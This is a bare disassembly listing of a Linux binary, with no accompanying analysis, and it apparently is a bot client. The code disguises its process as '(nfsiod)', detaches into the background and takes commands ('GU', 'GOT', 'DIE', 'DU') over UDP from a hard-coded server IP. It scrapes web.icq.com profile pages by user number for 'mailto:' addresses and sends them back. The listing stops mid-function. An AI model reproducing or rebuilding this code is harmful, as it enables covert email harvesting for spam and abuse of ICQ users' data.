08048090: pop %ecx 08048091: mov %esp,%ebx 08048093: mov %esp,%eax 08048095: mov %ecx,%edx 08048097: add %edx,%edx 08048099: add %edx,%edx 0804809b: add %edx,%eax 0804809d: add $0x4,%eax 080480a0: xor %ebp,%ebp 080480a2: push %ebp 080480a3: push %ebp 080480a4: push %ebp 080480a5: mov %esp,%ebp 080480a7: push %eax 080480a8: push %ebx 080480a9: push %ecx 080480aa: mov $0x88,%eax 080480af: mov $0x0,%ebx 080480b4: int $0x80 080480b6: mov 0x8(%esp,1),%eax # Possible reference to data '' 080480ba: mov %eax,0x807ad80 # Possible reference to data '' 080480bf: movzwl 0x807b2f0,%eax 080480c6: push %eax 080480c7: call 0x08064818 <__setfpucw> 080480cc: add $0x4,%esp 080480cf: call 0x08064040 <__libc_init> 080480d4: push $0x8074a40 080480d9: call 0x0805599c 080480de: add $0x4,%esp 080480e1: call 0x08048080 080480e6: call 0x08048134
080480eb: push %eax 080480ec: call 0x08055a50 080480f1: pop %ebx 080480f2: lea 0x0(%esi,1),%esi 080480f9: lea 0x0(%esi,1),%esi 08048100: mov $0x1,%eax * 08048105: int $0x80 | 08048107: jmp 0x08048100 * 08048109: lea 0x0(%esi,1),%esi 08048110: push %ebx 08048111: mov $0x807ba84,%ebx 08048116: cmpl $0x0,0x807ba84 0804811d: je 0x0804812c * 0804811f: nop | 08048120: mov (%ebx),%eax *| 08048122: call *%eax || 08048124: add $0x4,%ebx || 08048127: cmpl $0x0,(%ebx) || 0804812a: jne 0x08048120 *| 0804812c: pop %ebx * 0804812d: ret 0804812e: lea (%esi),%esi 08048130: ret 08048131: nop 08048132: nop 08048133: nop # 08048134
: 08048134: push %ebp 08048135: mov %esp,%ebp 08048137: sub $0x7534,%esp 0804813d: movl $0x0,-0x4(%ebp) 08048144: push $0x7530 08048149: push $0x0 0804814b: lea -0x7534(%ebp),%eax 08048151: push %eax 08048152: call 0x08064a84 08048157: add $0xc,%esp 0804815a: mov 0xc(%ebp),%eax 0804815d: mov (%eax),%edx 0804815f: push %edx 08048160: call 0x08064e30 08048165: add $0x4,%esp 08048168: mov %eax,%eax 0804816a: push %eax 0804816b: push $0x0 0804816d: mov 0xc(%ebp),%eax 08048170: mov (%eax),%edx 08048172: push %edx 08048173: call 0x08064a84 08048178: add $0xc,%esp # Possible reference to rodata '(nfsiod)' 0804817b: push $0x8074a48 08048180: mov 0xc(%ebp),%eax 08048183: mov (%eax),%edx 08048185: push %edx 08048186: call 0x08063aa8 0804818b: add $0x8,%esp 0804818e: push $0x1 08048190: push $0x11 08048192: call 0x08063e5c 08048197: add $0x8,%esp 0804819a: call 0x080644b8 <__libc_fork> 0804819f: mov %eax,%eax 080481a1: test %eax,%eax 080481a3: je 0x080481b0 * 080481a5: push $0x0 | 080481a7: call 0x08055a50 | 080481ac: add $0x4,%esp | 080481af: nop | 080481b0: call 0x080645e8 <__libc_setsid> * 080481b5: push $0x1 080481b7: push $0x11 080481b9: call 0x08063e5c 080481be: add $0x8,%esp 080481c1: push $0x1 080481c3: call 0x0806460c <__libc_setuid> 080481c8: add $0x4,%esp 080481cb: push $0x1 080481cd: call 0x08063e24 080481d2: add $0x4,%esp 080481d5: call 0x080644b8 <__libc_fork> 080481da: mov %eax,%eax 080481dc: test %eax,%eax 080481de: je 0x080481ec * 080481e0: push $0x0 | 080481e2: call 0x08055a50 | 080481e7: add $0x4,%esp | 080481ea: lea (%esi),%esi | 080481ec: push $0x1 * 080481ee: push $0xd 080481f0: call 0x08063e5c 080481f5: add $0x8,%esp # Possible reference to rodata '/' 080481f8: push $0x8074a51 080481fd: call 0x08064430 <__libc_chdir> 08048202: add $0x4,%esp 08048205: push $0x1 08048207: push $0x11 08048209: call 0x08063e5c 0804820e: add $0x8,%esp 08048211: jmp 0x08048218 * * 08048213: nop | | 08048214: jmp 0x08048254 |*| 08048216: lea (%esi),%esi ||| 08048218: lea -0x7534(%ebp),%eax *|| 0804821e: push %eax || 0804821f: mov -0x4(%ebp),%eax || 08048222: push %eax || 08048223: call 0x0804841c || 08048228: add $0x8,%esp || 0804822b: mov %eax,%eax || 0804822d: mov %eax,-0x4(%ebp) || 08048230: push $0x7530 || 08048235: lea -0x7534(%ebp),%eax || 0804823b: push %eax || 0804823c: mov -0x4(%ebp),%eax || 0804823f: push %eax || 08048240: call 0x08048670 || 08048245: add $0xc,%esp || 08048248: push $0x1 || 0804824a: call 0x08055844 || 0804824f: add $0x4,%esp || 08048252: jmp 0x08048211 |* 08048254: mov %ebp,%esp * 08048256: pop %ebp 08048257: ret # 08048258 : 08048258: push %ebp 08048259: mov %esp,%ebp 0804825b: sub $0x8,%esp 0804825e: mov 0x8(%ebp),%eax 08048261: push %eax 08048262: call 0x0804b4d8 08048267: add $0x4,%esp 0804826a: mov %eax,%eax 0804826c: mov %eax,%edx 0804826e: mov %edx,-0x4(%ebp) 08048271: cmp $-0x1,%edx 08048274: jne 0x080482af * 08048276: mov 0x8(%ebp),%eax | 08048279: push %eax | 0804827a: call 0x0804a5cc | 0804827f: add $0x4,%esp | 08048282: mov %eax,%eax | 08048284: mov %eax,-0x8(%ebp) | 08048287: cmpl $0x0,-0x8(%ebp) | 0804828b: jne 0x08048298 *| 0804828d: push $0x0 || 0804828f: call 0x08055a50 || 08048294: add $0x4,%esp || 08048297: nop || 08048298: push $0x4 *| 0804829a: lea -0x4(%ebp),%eax | 0804829d: push %eax | 0804829e: mov -0x8(%ebp),%eax | 080482a1: mov 0x10(%eax),%edx | 080482a4: mov (%edx),%eax | 080482a6: push %eax | 080482a7: call 0x080638e8 | 080482ac: add $0xc,%esp | 080482af: mov -0x4(%ebp),%eax * 080482b2: jmp 0x080482b4 * 080482b4: mov %ebp,%esp * 080482b6: pop %ebp 080482b7: ret # 080482b8 : 080482b8: push %ebp 080482b9: mov %esp,%ebp 080482bb: sub $0x4,%esp 080482be: push $0x11 080482c0: push $0x2 080482c2: push $0x2 080482c4: call 0x08063ff0 080482c9: add $0xc,%esp 080482cc: mov %eax,%eax 080482ce: mov %eax,-0x4(%ebp) 080482d1: cmpl $0x0,-0x4(%ebp) 080482d5: jne 0x080482e4 * 080482d7: push $0x0 | 080482d9: call 0x08055a50 | 080482de: add $0x4,%esp | 080482e1: lea 0x0(%esi),%esi | 080482e4: push $0x800 * 080482e9: push $0x4 080482eb: mov -0x4(%ebp),%eax 080482ee: push %eax 080482ef: call 0x08064488 <__libc_fcntl> 080482f4: add $0xc,%esp 080482f7: mov -0x4(%ebp),%eax 080482fa: jmp 0x080482fc * 080482fc: mov %ebp,%esp * 080482fe: pop %ebp 080482ff: ret # 08048300 : 08048300: push %ebp 08048301: mov %esp,%ebp 08048303: mov 0x8(%ebp),%eax 08048306: push %eax 08048307: call 0x0806445c <__libc_close> 0804830c: add $0x4,%esp 0804830f: xor %eax,%eax 08048311: jmp 0x08048314 * 08048313: nop | 08048314: mov %ebp,%esp * 08048316: pop %ebp 08048317: ret # 08048318 : 08048318: push %ebp 08048319: mov %esp,%ebp 0804831b: sub $0x10,%esp 0804831e: cmpl $0x0,0x8(%ebp) 08048322: je 0x0804837c * 08048324: push $0x10 | 08048326: lea -0x10(%ebp),%eax | 08048329: push %eax | 0804832a: call 0x08064894 | 0804832f: add $0x8,%esp | # Possible reference to rodata '216.242.103.2' 08048332: push $0x8074a53 | 08048337: call 0x08048258 | 0804833c: add $0x4,%esp | 0804833f: mov %eax,%eax | 08048341: mov %eax,-0xc(%ebp) | 08048344: movw $0x2,-0x10(%ebp) | 0804834a: movw $0xa5d0,-0xe(%ebp) | 08048350: push $0x10 | 08048352: lea -0x10(%ebp),%eax | 08048355: push %eax | 08048356: push $0x0 | 08048358: mov 0x10(%ebp),%eax | 0804835b: push %eax | 0804835c: mov 0xc(%ebp),%eax | 0804835f: push %eax | 08048360: mov 0x8(%ebp),%eax | 08048363: push %eax | 08048364: call 0x08063f90 | 08048369: add $0x18,%esp | 0804836c: mov %eax,%eax | 0804836e: test %eax,%eax | 08048370: jge 0x0804837c *| 08048372: push $0x0 || 08048374: call 0x08055a50 || 08048379: add $0x4,%esp || 0804837c: xor %eax,%eax ** 0804837e: jmp 0x08048380 * 08048380: mov %ebp,%esp * 08048382: pop %ebp 08048383: ret # 08048384 : 08048384: push %ebp 08048385: mov %esp,%ebp 08048387: sub $0x18,%esp 0804838a: movl $0x10,-0x14(%ebp) 08048391: movl $0x0,-0x18(%ebp) 08048398: mov 0x10(%ebp),%eax 0804839b: push %eax 0804839c: mov 0xc(%ebp),%eax 0804839f: push %eax 080483a0: call 0x08064894 080483a5: add $0x8,%esp 080483a8: cmpl $0x0,0x8(%ebp) 080483ac: je 0x08048414 * 080483ae: push $0x10 | 080483b0: lea -0x10(%ebp),%eax | 080483b3: push %eax | 080483b4: call 0x08064894 | 080483b9: add $0x8,%esp | # Possible reference to rodata '216.242.103.2' 080483bc: push $0x8074a53 | 080483c1: call 0x08048258 | 080483c6: add $0x4,%esp | 080483c9: mov %eax,%eax | 080483cb: mov %eax,-0xc(%ebp) | 080483ce: movw $0x2,-0x10(%ebp) | 080483d4: movw $0xa5d0,-0xe(%ebp) | 080483da: lea -0x14(%ebp),%eax | 080483dd: push %eax | 080483de: lea -0x10(%ebp),%eax | 080483e1: push %eax | 080483e2: push $0x0 | 080483e4: mov 0x10(%ebp),%eax | 080483e7: push %eax | 080483e8: mov 0xc(%ebp),%eax | 080483eb: push %eax | 080483ec: mov 0x8(%ebp),%eax | 080483ef: push %eax | 080483f0: call 0x08063ee4 | 080483f5: add $0x18,%esp | 080483f8: mov %eax,%eax | 080483fa: mov %eax,-0x18(%ebp) | 080483fd: cmpl $0x0,-0x18(%ebp) | 08048401: jge 0x0804840c * | 08048403: xor %eax,%eax | | 08048405: jmp 0x08048418 | *| 08048407: nop | || 08048408: jmp 0x08048414 |*|| 0804840a: lea (%esi),%esi |||| 0804840c: mov $0x1,%eax *||| 08048411: jmp 0x08048418 *||| 08048413: nop |||| 08048414: xor %eax,%eax |*|* 08048416: jmp 0x08048418 | |* 08048418: mov %ebp,%esp * ** 0804841a: pop %ebp 0804841b: ret # 0804841c : 0804841c: push %ebp 0804841d: mov %esp,%ebp 0804841f: sub $0x40c,%esp 08048425: movl $0x1,-0xc(%ebp) # Possible reference to data '' 0804842c: mov 0x807ad84,%eax 08048431: add $0x62,%eax 08048434: cmp %eax,0x8(%ebp) 08048437: ja 0x08048448 * # Possible reference to data '' 08048439: cmpl $0x0,0x807ad84 | 08048440: jne 0x08048664 |* 08048446: jmp 0x08048448 *|| 08048448: call 0x080482b8 **| 0804844d: mov %eax,%eax | 0804844f: mov %eax,-0x4(%ebp) | 08048452: mov 0xc(%ebp),%eax | 08048455: push %eax | 08048456: call 0x08064e30 | 0804845b: add $0x4,%esp | 0804845e: mov %eax,%eax | 08048460: cmp $0x3,%eax | 08048463: jbe 0x08048518 *| # beginning of while() || loop: || 08048469: cmpl $0x0,-0xc(%ebp) *|| 0804846d: jne 0x08048474 * ||| 0804846f: jmp 0x08048518 |*||| 08048474: movl $0x0,-0x8(%ebp) *|||| 0804847b: mov 0xc(%ebp),%eax |||| # Possible reference to data in bss 0804847e: add 0x8080f38,%eax |||| 08048484: movb $0x0,(%eax) |||| # Possible reference to data in bss 08048487: incl 0x8080f38 |||| # Possible reference to data in bss 0804848d: mov 0x8080f38,%eax *|||| 08048492: push %eax ||||| 08048493: mov 0xc(%ebp),%eax ||||| 08048496: push %eax ||||| 08048497: mov -0x4(%ebp),%eax ||||| 0804849a: push %eax ||||| 0804849b: call 0x08048318 ||||| 080484a0: add $0xc,%esp ||||| 080484a3: push $0xa ||||| 080484a5: call 0x08055844 ||||| 080484aa: add $0x4,%esp ||||| 080484ad: incl -0x8(%ebp) ||||| 080484b0: push $0x3e8 ||||| 080484b5: lea -0x40c(%ebp),%eax ||||| 080484bb: push %eax ||||| 080484bc: mov -0x4(%ebp),%eax ||||| 080484bf: push %eax ||||| 080484c0: call 0x08048384 ||||| 080484c5: add $0xc,%esp ||||| 080484c8: mov %eax,%eax ||||| 080484ca: test %eax,%eax ||||| 080484cc: jg 0x080484d8 *||||| 080484ce: cmpl $0xa,-0x8(%ebp) |||||| 080484d2: jle 0x080484dc *|||||| 080484d4: jmp 0x080484d8 *||||||| 080484d6: lea (%esi),%esi |||||||| 080484d8: jmp 0x080484e0 *|*||||| 080484da: lea (%esi),%esi ||||||| 080484dc: jmp 0x0804848d *|*|||| 080484de: lea (%esi),%esi | |||| 080484e0: cmpl $0xa,-0x8(%ebp) * |||| 080484e4: jle 0x080484f0 *|||| 080484e6: push $0x0 ||||| 080484e8: call 0x08055a50 ||||| 080484ed: add $0x4,%esp ||||| 080484f0: push $0x3 *|||| # Possible reference to rodata 'GOT' 080484f2: push $0x8074a61 |||| 080484f7: lea -0x40c(%ebp),%eax |||| 080484fd: push %eax |||| 080484fe: call 0x08064ef8 |||| 08048503: add $0xc,%esp |||| 08048506: mov %eax,%eax |||| 08048508: test %eax,%eax |||| 0804850a: jne 0x08048513 *|||| 0804850c: movl $0x0,-0xc(%ebp) ||||| 08048513: jmp 0x08048469 *|*|| # end of while | || 08048518: nop * *| 08048519: jmp 0x08048524 ** | || | 0804851b: nop || | 0804851c: jmp 0x0804865c ||*| 08048521: lea 0x0(%esi),%esi |||| |||| 08048524: movl $0x0,-0x8(%ebp) *||| 0804852b: push $0x3 *||| # Possible reference to rodata 'GU ' 0804852d: push $0x8074a65 |||| 08048532: mov -0x4(%ebp),%eax |||| 08048535: push %eax |||| 08048536: call 0x08048318 |||| 0804853b: add $0xc,%esp |||| 0804853e: push $0xa |||| 08048540: call 0x08055844 |||| 08048545: add $0x4,%esp |||| 08048548: incl -0x8(%ebp) |||| 0804854b: push $0x3e8 |||| 08048550: lea -0x40c(%ebp),%eax |||| 08048556: push %eax |||| 08048557: mov -0x4(%ebp),%eax |||| 0804855a: push %eax |||| 0804855b: call 0x08048384 |||| 08048560: add $0xc,%esp |||| 08048563: mov %eax,%eax |||| 08048565: test %eax,%eax |||| 08048567: jg 0x08048574 *|||| 08048569: cmpl $0xa,-0x8(%ebp) ||||| 0804856d: jle 0x08048578 *||||| 0804856f: jmp 0x08048574 *|||||| 08048571: lea 0x0(%esi),%esi ||||||| 08048574: jmp 0x0804857c *|*|||| 08048576: lea (%esi),%esi |||||| 08048578: jmp 0x0804852b *|*||| 0804857a: lea (%esi),%esi | ||| 0804857c: cmpl $0xa,-0x8(%ebp) * ||| 08048580: jle 0x08048598 *||| 08048582: mov -0x4(%ebp),%eax |||| 08048585: push %eax |||| 08048586: call 0x08048300 |||| 0804858b: add $0x4,%esp |||| 0804858e: push $0x0 |||| 08048590: call 0x08055a50 |||| 08048595: add $0x4,%esp |||| 08048598: push $0x3 *||| # Possible reference to rodata 'DIE' 0804859a: push $0x8074a69 ||| 0804859f: lea -0x40c(%ebp),%eax ||| 080485a5: push %eax ||| 080485a6: call 0x08064ef8 ||| 080485ab: add $0xc,%esp ||| 080485ae: mov %eax,%eax ||| 080485b0: test %eax,%eax ||| 080485b2: jne 0x080485cc *||| 080485b4: mov -0x4(%ebp),%eax |||| 080485b7: push %eax |||| 080485b8: call 0x08048300 |||| 080485bd: add $0x4,%esp |||| 080485c0: push $0x0 |||| 080485c2: call 0x08055a50 |||| 080485c7: add $0x4,%esp |||| 080485ca: lea (%esi),%esi |||| 080485cc: push $0x2 *||| # Possible reference to rodata 'DU' 080485ce: push $0x8074a6d ||| 080485d3: lea -0x40c(%ebp),%eax ||| 080485d9: push %eax ||| 080485da: call 0x08064ef8 ||| 080485df: add $0xc,%esp ||| 080485e2: mov %eax,%eax ||| 080485e4: test %eax,%eax ||| 080485e6: jne 0x08048654 *||| # Possible reference to data '' 080485e8: push $0x807ad84 |||| # Possible reference to rodata '%lu' 080485ed: push $0x8074a70 |||| 080485f2: lea -0x40c(%ebp),%eax |||| 080485f8: lea 0x2(%eax),%edx |||| 080485fb: push %edx |||| 080485fc: call 0x0804de0c <_IO_scanf> |||| 08048601: add $0xc,%esp |||| 08048604: push $0x7530 |||| 08048609: push $0x0 |||| 0804860b: mov 0xc(%ebp),%eax |||| 0804860e: push %eax |||| 0804860f: call 0x08064a84 |||| 08048614: add $0xc,%esp |||| # Possible reference to data '' 08048617: mov 0x807ad84,%eax |||| 0804861c: push %eax |||| # Possible reference to rodata 'SE%lu ' 0804861d: push $0x8074a74 |||| 08048622: mov 0xc(%ebp),%eax |||| 08048625: push %eax |||| 08048626: call 0x0804ddf4 <_IO_sprintf> |||| 0804862b: add $0xc,%esp |||| 0804862e: mov 0xc(%ebp),%eax |||| 08048631: push %eax |||| 08048632: call 0x08064e30 |||| 08048637: add $0x4,%esp |||| # Possible reference to data in bss 0804863a: mov %eax,0x8080f38 |||| 0804863f: mov -0x4(%ebp),%eax |||| 08048642: push %eax |||| 08048643: call 0x08048300 |||| 08048648: add $0x4,%esp |||| # Possible reference to data '' 0804864b: mov 0x807ad84,%eax |||| 08048650: jmp 0x0804866c *|||| 08048652: lea (%esi),%esi ||||| 08048654: jmp 0x08048519 |**|| 08048659: lea 0x0(%esi),%esi | || 0804865c: xor %eax,%eax | *| 0804865e: jmp 0x0804866c | *| 08048660: jmp 0x0804866c | *|| 08048662: lea (%esi),%esi | ||| 08048664: mov 0x8(%ebp),%edx | ||* 08048667: inc %edx | || 08048668: mov %edx,%eax | || 0804866a: jmp 0x0804866c | ||* 0804866c: mov %ebp,%esp * *** 0804866e: pop %ebp 0804866f: ret # 08048670 : 08048670: push %ebp 08048671: mov %esp,%ebp 08048673: sub $0x428,%esp 08048679: movl $0x1,-0x18(%ebp) 08048680: movl $0x0,-0x20(%ebp) 08048687: movb $0x20,-0x422(%ebp) 0804868e: movl $0x0,-0x428(%ebp) # Possible reference to rodata 'web.icq.com' 08048698: push $0x8074a7b 0804869d: call 0x08048258 080486a2: add $0x4,%esp 080486a5: mov %eax,%eax 080486a7: mov %eax,-0xc(%ebp) 080486aa: movw $0x2,-0x10(%ebp) 080486b0: push $0x50 080486b2: call 0x08064880 <__htons> 080486b7: add $0x4,%esp 080486ba: mov %eax,%eax 080486bc: mov %ax,-0xe(%ebp) 080486c0: push $0x6 080486c2: push $0x1 080486c4: push $0x2 080486c6: call 0x08063ff0 080486cb: add $0xc,%esp 080486ce: mov %eax,%eax 080486d0: mov %eax,-0x14(%ebp) 080486d3: push $0x10 080486d5: lea -0x10(%ebp),%eax 080486d8: push %eax 080486d9: mov -0x14(%ebp),%eax 080486dc: push %eax 080486dd: call 0x08063e9c 080486e2: add $0xc,%esp 080486e5: mov %eax,%eax 080486e7: cmp $-0x1,%eax 080486ea: jne 0x08048700 * 080486ec: mov -0x14(%ebp),%eax | 080486ef: push %eax | 080486f0: call 0x0806445c <__libc_close> | 080486f5: add $0x4,%esp | 080486f8: xor %eax,%eax | 080486fa: jmp 0x080489a4 |* 080486ff: nop || 08048700: push $0x1 *| 08048702: call 0x08055844 | 08048707: add $0x4,%esp | 0804870a: push $0x800 | 0804870f: push $0x4 | 08048711: mov -0x14(%ebp),%eax | 08048714: push %eax | 08048715: call 0x08064488 <__libc_fcntl> | 0804871a: add $0xc,%esp | 0804871d: mov 0x8(%ebp),%eax | 08048720: push %eax | # Possible reference to rodata 'GET /wwp?Uin=%lu HTTP/1.0\r\nHost: web.icq.com\r\n\r\n' 08048721: push $0x8074a87 | 08048726: lea -0x420(%ebp),%eax | 0804872c: push %eax | 0804872d: call 0x0804ddf4 | 08048732: add $0xc,%esp | 08048735: push $0x0 | 08048737: lea -0x420(%ebp),%eax | 0804873d: push %eax | 0804873e: call 0x08064e30 | 08048743: add $0x4,%esp | 08048746: mov %eax,%eax | 08048748: push %eax | 08048749: lea -0x420(%ebp),%eax | 0804874f: push %eax | 08048750: mov -0x14(%ebp),%eax | 08048753: push %eax | 08048754: call 0x08063f44 | 08048759: add $0x10,%esp | 0804875c: push $0x0 | 0804875e: call 0x080646f0 <__libc_time> | 08048763: add $0x4,%esp | 08048766: mov %eax,-0x428(%ebp) | 0804876c: cmpl $0x0,-0x18(%ebp) *| 08048770: jne 0x08048778 * || 08048772: jmp 0x08048994 |*|| 08048777: nop |||| 08048778: push $0x0 *||| 0804877a: call 0x080646f0 <__libc_time> ||| 0804877f: add $0x4,%esp ||| 08048782: mov %eax,%eax ||| 08048784: mov %eax,%edx ||| 08048786: sub -0x428(%ebp),%edx ||| 0804878c: cmp $0x19,%edx ||| 0804878f: jbe 0x08048798 *||| 08048791: movl $0x0,-0x18(%ebp) |||| 08048798: mov -0x14(%ebp),%eax *||| 0804879b: push %eax ||| 0804879c: call 0x080489a8 ||| 080487a1: add $0x4,%esp ||| 080487a4: mov %eax,%eax ||| 080487a6: test %eax,%eax ||| 080487a8: je 0x0804898e *||| 080487ae: push $0x1 |||| 080487b0: lea -0x421(%ebp),%eax |||| 080487b6: push %eax |||| 080487b7: mov -0x14(%ebp),%eax |||| 080487ba: push %eax |||| 080487bb: call 0x0806458c <__libc_read> |||| 080487c0: add $0xc,%esp |||| 080487c3: mov %eax,%eax |||| 080487c5: mov %eax,-0x1c(%ebp) |||| 080487c8: cmpl $0x1,-0x1c(%ebp) |||| 080487cc: jne 0x080487ec * |||| 080487ce: cmpl $0x0,-0x20(%ebp) | |||| 080487d2: jne 0x080487ec *| |||| 080487d4: cmpb $0x22,-0x421(%ebp) || |||| 080487db: jne 0x080487e4 ||*|||| 080487dd: movl $0x1,-0x20(%ebp) ||||||| 080487e4: jmp 0x0804897c ||*|||| 080487e9: lea 0x0(%esi),%esi ||||||| 080487ec: cmpl $0x1,-0x1c(%ebp) **||||| 080487f0: jne 0x080488f0 *||||| 080487f6: cmpl $0x1,-0x20(%ebp) |||||| 080487fa: jne 0x080488f0 *|||||| 08048800: movzbl -0x422(%ebp),%eax ||||||| 08048807: cmp $0x6c,%eax ||||||| 0804880a: je 0x080488ac * ||||||| 08048810: cmp $0x6c,%eax | ||||||| 08048813: jg 0x08048838 *| ||||||| 08048815: cmp $0x61,%eax || ||||||| 08048818: je 0x08048884 * || ||||||| 0804881a: cmp $0x61,%eax | || ||||||| 0804881d: jg 0x0804882c | ||* ||||||| 0804881f: cmp $0x22,%eax | ||| ||||||| 08048822: je 0x0804885c | * ||| ||||||| 08048824: jmp 0x080488e8 | | |||*||||||| 08048829: lea 0x0(%esi),%esi | | ||||||||||| 0804882c: cmp $0x69,%eax | | ||*|||||||| 0804882f: je 0x08048898 *| | || |||||||| 08048831: jmp 0x080488e8 || | ||*|||||||| 08048836: lea (%esi),%esi || | ||||||||||| 08048838: cmp $0x6f,%eax || | *|||||||||| 0804883b: je 0x080488d4 || | * |||||||||| 08048841: cmp $0x6f,%eax || | | |||||||||| 08048844: jg 0x08048850 || |*| |||||||||| 08048846: cmp $0x6d,%eax || ||| |||||||||| 08048849: je 0x08048870 *|| ||| |||||||||| 0804884b: jmp 0x080488e8 ||| |||*|||||||||| 08048850: cmp $0x74,%eax ||| |*|||||||||||| 08048853: je 0x080488c0 |||*| |||||||||||| 08048855: jmp 0x080488e8 |||||*|||||||||||| 0804885a: lea (%esi),%esi |||||||||||||||||| 0804885c: cmpb $0x6d,-0x421(%ebp) ||||*||||||||||||| 08048863: je 0x0804886c ||||*||||||||||||| 08048865: movl $0x0,-0x20(%ebp) |||||||||||||||||| 0804886c: jmp 0x080488e8 ||||*||||||||||||| 0804886e: lea (%esi),%esi |||||||||||||||||| 08048870: cmpb $0x61,-0x421(%ebp) *||||||||||||||||| 08048877: je 0x08048880 *||||||||||||||||| 08048879: movl $0x0,-0x20(%ebp) |||||||||||||||||| 08048880: jmp 0x080488e8 *||||||||||||||||| 08048882: lea (%esi),%esi |||||||||||||||||| 08048884: cmpb $0x69,-0x421(%ebp) ||*||||||||||||||| 0804888b: je 0x08048894 ||*||||||||||||||| 0804888d: movl $0x0,-0x20(%ebp) |||||||||||||||||| 08048894: jmp 0x080488e8 ||*||||||||||||||| 08048896: lea (%esi),%esi |||||||||||||||||| 08048898: cmpb $0x6c,-0x421(%ebp) |*|||||||||||||||| 0804889f: je 0x080488a8 |*|||||||||||||||| 080488a1: movl $0x0,-0x20(%ebp) |||||||||||||||||| 080488a8: jmp 0x080488e8 |*|||||||||||||||| 080488aa: lea (%esi),%esi |||||||||||||||||| 080488ac: cmpb $0x74,-0x421(%ebp) ||||||||*||||||||| 080488b3: je 0x080488bc ||||||||*||||||||| 080488b5: movl $0x0,-0x20(%ebp) |||||||||||||||||| 080488bc: jmp 0x080488e8 ||||||||*||||||||| 080488be: lea (%esi),%esi |||||||||||||||||| 080488c0: cmpb $0x6f,-0x421(%ebp) |||*|||||||||||||| 080488c7: je 0x080488d0 |||*|||||||||||||| 080488c9: movl $0x0,-0x20(%ebp) |||||||||||||||||| 080488d0: jmp 0x080488e8 |||*|||||||||||||| 080488d2: lea (%esi),%esi |||||||||||||||||| 080488d4: cmpb $0x3a,-0x421(%ebp) ||||||*||||||||||| 080488db: jne 0x080488e4 ||||||*||||||||||| 080488dd: movl $0x2,-0x20(%ebp) |||||||||||||||||| 080488e4: jmp 0x080488e8 ||||||*||||||||||| 080488e6: lea (%esi),%esi |||||||||||||||||| 080488e8: jmp 0x0804897c ***********||||||| 080488ed: lea 0x0(%esi),%esi |||||||| ; big jump 080488f0: cmpl $0x1,-0x1c(%ebp) |**||||| 080488f4: jne 0x0804897c | *||||| 080488fa: cmpl $0x2,-0x20(%ebp) | |||||| 080488fe: jne 0x0804897c |*|||||| 08048900: cmpb $0x22,-0x421(%ebp) |||||||| 08048907: je 0x08048944 *|||||||| 08048909: mov 0x10(%ebp),%eax ||||||||| 0804890c: dec %eax ||||||||| # Possible reference to data in bss 0804890d: cmp %eax,0x8080f38 ||||||||| 08048913: jge 0x08048944 * ||||||||| 08048915: movzbl -0x421(%ebp),%eax | ||||||||| 0804891c: push %eax | ||||||||| 0804891d: call 0x08048a90 | ||||||||| 08048922: add $0x4,%esp | ||||||||| 08048925: mov %eax,%eax | ||||||||| 08048927: test %eax,%eax | ||||||||| 08048929: je 0x08048942 |*||||||||| 0804892b: mov 0xc(%ebp),%eax ||||||||||| # Possible reference to data in bss 0804892e: add 0x8080f38,%eax ||||||||||| 08048934: mov -0x421(%ebp),%dl ||||||||||| 0804893a: mov %dl,(%eax) ||||||||||| # Possible reference to data in bss 0804893c: incl 0x8080f38 ||||||||||| 08048942: jmp 0x0804897c |*||||||||| 08048944: mov 0x10(%ebp),%eax *|*|||||||| 08048947: dec %eax | |||||||| # Possible reference to data in bss 08048948: cmp %eax,0x8080f38 | |||||||| 0804894e: jge 0x08048962 |*|||||||| 08048950: mov 0xc(%ebp),%eax |||||||||| # Possible reference to data in bss 08048953: add 0x8080f38,%eax |||||||||| 08048959: movb $0xa,(%eax) |||||||||| # Possible reference to data in bss 0804895c: incl 0x8080f38 |||||||||| 08048962: mov -0x14(%ebp),%eax |*|||||||| 08048965: push %eax | |||||||| 08048966: call 0x0806445c <__libc_close> | |||||||| 0804896b: add $0x4,%esp | |||||||| 0804896e: push $0x1 | |||||||| 08048970: call 0x08055844 | |||||||| 08048975: add $0x4,%esp | |||||||| 08048978: xor %eax,%eax | |||||||| 0804897a: jmp 0x080489a4 |*|||||||| 0804897c: cmpl $0x1,-0x1c(%ebp) *|****|||| 08048980: jne 0x0804898e | *|||| 08048982: mov -0x421(%ebp),%al | ||||| 08048988: mov %al,-0x422(%ebp) | ||||| 0804898e: jmp 0x0804876c | **|*| 08048993: nop | | | 08048994: mov -0x14(%ebp),%eax | * | 08048997: push %eax | | 08048998: call 0x0806445c <__libc_close> | | 0804899d: add $0x4,%esp | | 080489a0: xor %eax,%eax | | 080489a2: jmp 0x080489a4 | *| 080489a4: mov %ebp,%esp * ** 080489a6: pop %ebp 080489a7: ret # 080489a8 : 080489a8: push %ebp 080489a9: mov %esp,%ebp 080489ab: sub $0x4,%esp 080489ae: lea -0x4(%ebp),%eax 080489b1: push %eax 080489b2: push $0x541b 080489b7: mov 0x8(%ebp),%eax 080489ba: push %eax 080489bb: call 0x0806452c <__libc_ioctl> 080489c0: add $0xc,%esp 080489c3: mov %eax,%eax 080489c5: cmp $-0x1,%eax 080489c8: jne 0x080489d4 * 080489ca: mov $-0x1,%eax | 080489cf: jmp 0x080489dc |* 080489d1: lea 0x0(%esi),%esi || 080489d4: mov -0x4(%ebp),%eax *| 080489d7: jmp 0x080489dc *| 080489d9: lea 0x0(%esi),%esi || 080489dc: mov %ebp,%esp ** 080489de: pop %ebp 080489df: ret 080747b4: push %ebp 080747b5: mov %esp,%ebp 080747b7: sub $0x24,%esp 080747ba: push %edi 080747bb: push %esi 080747bc: push %ebx 080747bd: mov 0x8(%ebp),%ebx 080747c0: mov 0xc(%ebp),%esi 080747c3: mov 0x10(%ebp),%eax 080747c6: mov %eax,-0x1c(%ebp) 080747c9: mov 0x14(%ebp),%edi 080747cc: mov %ebx,-0x4(%ebp) 080747cf: mov %esi,%ebx 080747d1: test %edi,%edi 080747d3: jne 0x08074818 * 080747d5: cmp %ebx,%eax | 080747d7: jbe 0x080747e8 |* 080747d9: mov -0x4(%ebp),%eax || 080747dc: mov %ebx,%edx || 080747de: divl -0x1c(%ebp) || 080747e1: mov %eax,%edi || 080747e3: jmp 0x080748a4 ||* 080747e8: cmpl $0x0,-0x1c(%ebp) |*| 080747ec: jne 0x080747fd |*| 080747ee: mov $0x1,%edx ||| 080747f3: mov %edx,%eax ||| 080747f5: xor %edx,%edx ||| 080747f7: divl -0x1c(%ebp) ||| 080747fa: mov %eax,-0x1c(%ebp) ||| 080747fd: mov %ebx,%eax |*| 080747ff: xor %edx,%edx | | 08074801: divl -0x1c(%ebp) | | 08074804: mov %edx,%ebx | | 08074806: mov %eax,%esi | | 08074808: 